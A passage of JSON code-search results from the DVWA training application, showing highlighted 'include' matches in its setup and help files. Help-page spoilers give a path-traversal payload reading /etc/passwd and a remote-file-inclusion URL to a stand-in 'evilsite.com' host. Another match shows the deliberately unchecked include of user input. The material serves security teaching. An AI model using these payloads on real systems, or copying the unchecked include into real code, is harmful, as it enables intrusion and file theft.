"match": "<span class=\"line-number\">6:</span> }\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token function\">define</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'DVWA_WEB_ROOT_TO_PHPIDS'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'external/phpids/'</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">dvwaPhpIdsVersionGet</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'/'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token function\">define</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'DVWA_WEB_PAGE_TO_PHPIDS'</span><span class=\"token punctuation\">,</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> DVWA_WEB_ROOT_TO_PHPIDS <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Add PHPIDS <span class=\"token keyword\">to</span> include path</span>\n<span class=\"line-number\">12:</span> <span class=\"token function\">set_include_path</span><span class=\"token punctuation\">(</span> <span class=\"token function\">get_include_path</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> PATH_SEPARATOR <span class=\"token punctuation\">.</span> DVWA_WEB_PAGE_TO_PHPIDS <span class=\"token punctuation\">.</span> <span class=\"token string\">'lib/'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> require_once <span class=\"token string\">'IDS/Init.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> function <span class=\"token function\">dvwaPhpIdsVersionGet</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span> {",
"line": 11,
"start": 6,
"end": 17,
"severity": "unknown",
"note": ""
},
{
"id": 39,
"file": "/home/chris/src/DVWA-master/hackable/flags/fi.php",
"filetype": "php",
"search": "\\sinclude",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> !<span class=\"token function\">defined</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'DVWA_WEB_PAGE_TO_ROOT'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">4:</span> \t<span class=\"token keyword\">exit</span> <span class=\"token punctuation\">(</span>\"Nice try <span class=\"token comment\" spellcheck=\"true\">;-). Use the file include next time!\");</span></span>\n<span class=\"line-number\">5:</span> }\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> <span class=\"token operator\">?</span><span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \n<span class=\"line-number\">9:</span> <span class=\"token number\">1</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">)</span> Bond<span class=\"token punctuation\">.</span> James Bond",
"line": 4,
"start": 1,
"end": 10,
"severity": "unknown",
"note": ""
},
{
"id": 40,
"file": "/home/chris/src/DVWA-master/index.php",
"filetype": "php",
"search": "\\sinclude",
"match": "<span class=\"line-number\">18:</span> \t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">19:</span> \n<span class=\"line-number\">20:</span> \t<span class=\"token operator\"><</span>h2<span class=\"token operator\">></span>General Instructions<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h2<span class=\"token operator\">></span>\n<span class=\"line-number\">21:</span> \t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>It is up <span class=\"token keyword\">to</span> the user how they approach DVWA<span class=\"token punctuation\">.</span> Either by working through every module at a fixed level<span class=\"token punctuation\">,</span> <span class=\"token operator\">or</span> selecting any module <span class=\"token operator\">and</span> working up <span class=\"token keyword\">to</span> reach the highest level they can before moving onto the <span class=\"token keyword\">next</span> one<span class=\"token punctuation\">.</span> There is <span class=\"token operator\">not</span> a fixed object <span class=\"token keyword\">to</span> complete a module<span class=\"token comment\" spellcheck=\"true\">; however users should feel that they have successfully exploited the system as best as they possible could by using that particular vulnerability.</p></span>\n<span class=\"line-number\">22:</span> \t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Please note<span class=\"token punctuation\">,</span> there are <span class=\"token operator\"><</span>em<span class=\"token operator\">></span>both documented <span class=\"token operator\">and</span> undocumented vulnerability<span class=\"token operator\"><</span><span class=\"token operator\">/</span>em<span class=\"token operator\">></span> <span class=\"token keyword\">with</span> this software<span class=\"token punctuation\">.</span> This is intentional<span class=\"token punctuation\">.</span> You are encouraged <span class=\"token keyword\">to</span> try <span class=\"token operator\">and</span> discover as many issues as possible<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">23:</span> \t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>DVWA also includes a Web Application Firewall <span class=\"token punctuation\">(</span>WAF<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> PHPIDS<span class=\"token punctuation\">,</span> which can be enabled at any stage <span class=\"token keyword\">to</span> further increase the difficulty<span class=\"token punctuation\">.</span> This will demonstrate how adding another layer of security may block certain malicious actions<span class=\"token punctuation\">.</span> Note<span class=\"token punctuation\">,</span> there are also various public methods at bypassing these protections <span class=\"token punctuation\">(</span>so this can be see an as extension <span class=\"token keyword\">for</span> more advance users<span class=\"token punctuation\">)</span>!<span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">24:</span> \t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>There is a help button at the bottom of each page<span class=\"token punctuation\">,</span> which allows you <span class=\"token keyword\">to</span> view hints <span class=\"token operator\">&</span> tips <span class=\"token keyword\">for</span> that vulnerability<span class=\"token punctuation\">.</span> There are also additional links <span class=\"token keyword\">for</span> further background reading<span class=\"token punctuation\">,</span> which relates <span class=\"token keyword\">to</span> that security issue<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">25:</span> \t<span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">26:</span> \t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">27:</span> \n<span class=\"line-number\">28:</span> \t<span class=\"token operator\"><</span>h2<span class=\"token operator\">></span>WARNING!<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h2<span class=\"token operator\">></span>",
"line": 23,
"start": 18,
"end": 29,
"severity": "unknown",
"note": ""
},
{
"id": 59,
"file": "/home/chris/src/DVWA-master/setup.php",
"filetype": "php",
"search": "\\sinclude",
"match": "<span class=\"line-number\">12:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'create_db'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">13:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"line-number\">14:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'setup.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'MySQL'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">17:</span> \t\tinclude_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/MySQL.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">18:</span> \t}\n<span class=\"line-number\">19:</span> \t<span class=\"token function\">elseif</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'PGSQL'</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">20:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> include_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/PGSQL.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'PostgreSQL is not yet fully supported.'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 17,
"start": 12,
"end": 23,
"severity": "unknown",
"note": ""
},
{
"id": 60,
"file": "/home/chris/src/DVWA-master/setup.php",
"filetype": "php",
"search": "\\sinclude",
"match": "<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'MySQL'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">17:</span> \t\tinclude_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/MySQL.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t}\n<span class=\"line-number\">19:</span> \t<span class=\"token function\">elseif</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$DBMS</span> <span class=\"token operator\">==</span> <span class=\"token string\">'PGSQL'</span><span class=\"token punctuation\">)</span> {\n<span class=\"highlight\"><span class=\"line-number\">20:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> include_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">'dvwa/includes/DBMS/PGSQL.php'</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">21:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'PostgreSQL is not yet fully supported.'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token function\">dvwaPageReload</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">23:</span> \t}\n<span class=\"line-number\">24:</span> \t<span class=\"token keyword\">else</span> {\n<span class=\"line-number\">25:</span> \t\t<span class=\"token function\">dvwaMessagePush</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'ERROR: Invalid database selected. Please review the config file syntax.'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 20,
"start": 15,
"end": 26,
"severity": "unknown",
"note": ""
},
{
"id": 61,
"file": "/home/chris/src/DVWA-master/vulnerabilities/brute/help/help.php",
"filetype": "php",
"search": "\\sinclude",
"match": "<span class=\"line-number\">7:</span> \t<span class=\"token operator\"><</span>td<span class=\"token operator\">></span><span class=\"token operator\"><</span>div id<span class=\"token operator\">=</span><span class=\"token string\">\"code\"</span><span class=\"token operator\">></span>\n<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>About<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Password cracking is the process of recovering passwords from data that has been stored <span class=\"token keyword\">in</span> <span class=\"token operator\">or</span> transmitted by a computer system<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">10:</span> \t\t\tA common approach is <span class=\"token keyword\">to</span> repeatedly try guesses <span class=\"token keyword\">for</span> the password<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">11:</span> \n<span class=\"highlight\"><span class=\"line-number\">12:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Users often choose weak passwords<span class=\"token punctuation\">.</span> Examples of insecure choices include single words found <span class=\"token keyword\">in</span> dictionaries<span class=\"token punctuation\">,</span> family names<span class=\"token punctuation\">,</span> any too short password</span>\n<span class=\"line-number\">13:</span> \t\t\t<span class=\"token punctuation\">(</span>usually thought <span class=\"token keyword\">to</span> be less than <span class=\"token number\">6</span> <span class=\"token operator\">or</span> <span class=\"token number\">7</span> characters<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">or</span> predictable patterns\n<span class=\"line-number\">14:</span> \t\t\t<span class=\"token punctuation\">(</span>e<span class=\"token punctuation\">.</span>g<span class=\"token punctuation\">.</span> alternating vowels <span class=\"token operator\">and</span> consonants<span class=\"token punctuation\">,</span> which is known as leetspeak<span class=\"token punctuation\">,</span> so <span class=\"token string\">\"password\"</span> becomes <span class=\"token string\">\"p@55w0rd\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Creating a targeted wordlists<span class=\"token punctuation\">,</span> which is generated towards the target<span class=\"token punctuation\">,</span> often gives the highest success rate<span class=\"token punctuation\">.</span> There are public tools out there that will create a dictionary\n<span class=\"line-number\">17:</span> \t\t\tbased on a combination of company websites<span class=\"token punctuation\">,</span> personal social networks <span class=\"token operator\">and</span> other common information <span class=\"token punctuation\">(</span>such as birthdays <span class=\"token operator\">or</span> year of graduation<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 87,
"file": "/home/chris/src/DVWA-master/vulnerabilities/captcha/help/help.php",
"filetype": "php",
"search": "\\sinclude",
"match": "<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>A <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php echo <span class=\"token function\">dvwaExternalLinkUrlGet</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'http://www.captcha.net/'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'CAPTCHA'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; ?> is a program that can tell whether its user is a human or a computer. You've probably seen</span>\n<span class=\"line-number\">10:</span> \t\t\tthem <span class=\"token operator\">-</span> colourful images <span class=\"token keyword\">with</span> distorted text at the bottom of Web registration forms<span class=\"token punctuation\">.</span> CAPTCHAs are used by many websites <span class=\"token keyword\">to</span> prevent abuse from\n<span class=\"line-number\">11:</span> \t\t\t<span class=\"token string\">\"bots\"</span><span class=\"token punctuation\">,</span> <span class=\"token operator\">or</span> automated programs usually written <span class=\"token keyword\">to</span> generate spam<span class=\"token punctuation\">.</span> No computer program can read distorted text as well as humans can<span class=\"token punctuation\">,</span> so bots\n<span class=\"line-number\">12:</span> \t\t\tcannot navigate sites protected by CAPTCHAs<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">13:</span> \n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>CAPTCHAs are often used <span class=\"token keyword\">to</span> protect sensitive functionality from automated bots<span class=\"token punctuation\">.</span> Such functionality typically includes user registration <span class=\"token operator\">and</span> changes<span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">15:</span> \t\t\tpassword changes<span class=\"token punctuation\">,</span> <span class=\"token operator\">and</span> posting content<span class=\"token punctuation\">.</span> <span class=\"token keyword\">In</span> this example<span class=\"token punctuation\">,</span> the CAPTCHA is guarding the change password functionality <span class=\"token keyword\">for</span> the user account<span class=\"token punctuation\">.</span> This provides\n<span class=\"line-number\">16:</span> \t\t\tlimited protection from CSRF attacks as well as automated bot guessing<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">19:</span> ",
"line": 14,
"start": 9,
"end": 20,
"severity": "unknown",
"note": ""
},
{
"id": 194,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/help/help.php",
"filetype": "php",
"search": "\\sinclude",
"match": "<span class=\"line-number\">8:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>About<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">9:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Some web applications allow the user <span class=\"token keyword\">to</span> specify input that is used directly into file streams <span class=\"token operator\">or</span> allows the user <span class=\"token keyword\">to</span> upload files <span class=\"token keyword\">to</span> the server<span class=\"token punctuation\">.</span>\n<span class=\"line-number\">10:</span> \t\t\tAt a later time the web application accesses the user supplied input <span class=\"token keyword\">in</span> the web applications context<span class=\"token punctuation\">.</span> By doing this<span class=\"token punctuation\">,</span> the web application is allowing\n<span class=\"line-number\">11:</span> \t\t\tthe potential <span class=\"token keyword\">for</span> malicious file execution<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">12:</span> \n<span class=\"highlight\"><span class=\"line-number\">13:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span><span class=\"token keyword\">If</span> the file chosen <span class=\"token keyword\">to</span> be included is <span class=\"token keyword\">local</span> on the target machine<span class=\"token punctuation\">,</span> it is called \"<span class=\"token keyword\">Local</span> File Inclusion <span class=\"token punctuation\">(</span>LFI<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span> But files may also be included on other</span>\n<span class=\"line-number\">14:</span> \t\t\tmachines<span class=\"token punctuation\">,</span> which <span class=\"token keyword\">then</span> the attack is a \"Remote File Inclusion <span class=\"token punctuation\">(</span>RFI<span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">15:</span> \n<span class=\"line-number\">16:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>When RFI is <span class=\"token operator\">not</span> an option<span class=\"token punctuation\">.</span> using another vulnerability <span class=\"token keyword\">with</span> LFI <span class=\"token punctuation\">(</span>such as file upload <span class=\"token operator\">and</span> directory traversal<span class=\"token punctuation\">)</span> can often achieve the same effect<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Note<span class=\"token punctuation\">,</span> the term <span class=\"token string\">\"file inclusion\"</span> is <span class=\"token operator\">not</span> the same as <span class=\"token string\">\"arbitrary file access\"</span> <span class=\"token operator\">or</span> <span class=\"token string\">\"file disclosure\"</span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>",
"line": 13,
"start": 8,
"end": 19,
"severity": "unknown",
"note": ""
},
{
"id": 195,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/help/help.php",
"filetype": "php",
"search": "\\sinclude",
"match": "<span class=\"line-number\">23:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Read all <span class=\"token operator\"><</span>u<span class=\"token operator\">></span>five<span class=\"token operator\"><</span><span class=\"token operator\">/</span>u<span class=\"token operator\">></span> famous quotes from <span class=\"token string\">'<a href=\"../hackable/flags/fi.php\">../hackable/flags/fi.php</a>'</span> using only the file inclusion<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">24:</span> \n<span class=\"line-number\">25:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>hr <span class=\"token operator\">/</span><span class=\"token operator\">></span><span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">26:</span> \n<span class=\"line-number\">27:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>Low Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"highlight\"><span class=\"line-number\">28:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>This allows <span class=\"token keyword\">for</span> direct input into <span class=\"token operator\"><</span>u<span class=\"token operator\">></span>one of many PHP functions<span class=\"token operator\"><</span><span class=\"token operator\">/</span>u<span class=\"token operator\">></span> that will include the content when executing<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">29:</span> \n<span class=\"line-number\">30:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>Depending on the web service configuration will depend <span class=\"token keyword\">if</span> RFI is a possibility<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span>\n<span class=\"line-number\">31:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>LFI<span class=\"token punctuation\">:</span> <span class=\"token operator\">?</span>page<span class=\"token operator\">=</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token operator\">/</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token operator\">/</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token operator\">/</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token operator\">/</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token operator\">/</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token operator\">/</span>etc<span class=\"token operator\">/</span>passwd<span class=\"token operator\"><</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span>\n<span class=\"line-number\">32:</span> \t\t\tSpoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>RFI<span class=\"token punctuation\">:</span> <span class=\"token operator\">?</span>page<span class=\"token operator\">=</span>http<span class=\"token punctuation\">:</span><span class=\"token operator\">/</span><span class=\"token operator\">/</span>www<span class=\"token punctuation\">.</span>evilsite<span class=\"token punctuation\">.</span>com<span class=\"token operator\">/</span>evil<span class=\"token punctuation\">.</span>php<span class=\"token operator\"><</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">33:</span> ",
"line": 28,
"start": 23,
"end": 34,
"severity": "unknown",
"note": ""
},
{
"id": 196,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/help/help.php",
"filetype": "php",
"search": "\\sinclude",
"match": "<span class=\"line-number\">40:</span> \n<span class=\"line-number\">41:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">42:</span> \n<span class=\"line-number\">43:</span> \t\t<span class=\"token operator\"><</span>h3<span class=\"token operator\">></span>High Level<span class=\"token operator\"><</span><span class=\"token operator\">/</span>h3<span class=\"token operator\">></span>\n<span class=\"line-number\">44:</span> \t\t<span class=\"token operator\"><</span>p<span class=\"token operator\">></span>The developer has had enough<span class=\"token punctuation\">.</span> They decided <span class=\"token keyword\">to</span> only allow certain files <span class=\"token keyword\">to</span> be used<span class=\"token punctuation\">.</span> However as there are multiple files <span class=\"token keyword\">with</span> the same basename<span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">45:</span> \t\t\tthey use a wildcard <span class=\"token keyword\">to</span> include them all<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>p<span class=\"token operator\">></span></span>\n<span class=\"line-number\">46:</span> \t\t<span class=\"token operator\"><</span>pre<span class=\"token operator\">></span>Spoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>LFI<span class=\"token punctuation\">:</span> The filename only has start <span class=\"token keyword\">with</span> a certain value<span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span>\n<span class=\"line-number\">47:</span> \t\t\tSpoiler<span class=\"token punctuation\">:</span> <span class=\"token operator\"><</span>span class<span class=\"token operator\">=</span><span class=\"token string\">\"spoiler\"</span><span class=\"token operator\">></span>RFI<span class=\"token punctuation\">:</span> Need <span class=\"token keyword\">to</span> link <span class=\"token keyword\">in</span> another vulnerability<span class=\"token punctuation\">,</span> such as file upload<span class=\"token operator\"><</span><span class=\"token operator\">/</span>span<span class=\"token operator\">></span><span class=\"token punctuation\">.</span><span class=\"token operator\"><</span><span class=\"token operator\">/</span>pre<span class=\"token operator\">></span>\n<span class=\"line-number\">48:</span> \n<span class=\"line-number\">49:</span> \t\t<span class=\"token operator\"><</span>br <span class=\"token operator\">/</span><span class=\"token operator\">></span>\n<span class=\"line-number\">50:</span> ",
"line": 45,
"start": 40,
"end": 51,
"severity": "unknown",
"note": ""
},
{
"id": 199,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/index.php",
"filetype": "php",
"search": "\\sinclude",
"match": "<span class=\"line-number\">31:</span> \n<span class=\"line-number\">32:</span> require_once DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"vulnerabilities/fi/source/{$vulnerabilityFile}\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">33:</span> \n<span class=\"line-number\">34:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">count</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span>\n<span class=\"line-number\">35:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span>\n<span class=\"highlight\"><span class=\"line-number\">36:</span> \t<span class=\"token function\">include</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">37:</span> <span class=\"token keyword\">else</span> {\n<span class=\"line-number\">38:</span> \t<span class=\"token function\">header</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'Location:?page=include.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">39:</span> \t<span class=\"token keyword\">exit</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">40:</span> }\n<span class=\"line-number\">41:</span> ",
"line": 36,
"start": 31,
"end": 42,
"severity": "unknown",
"note": ""
},
{
"id": 202,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/source/impossible.php",
"filetype": "php",
"search": "\\sinclude",
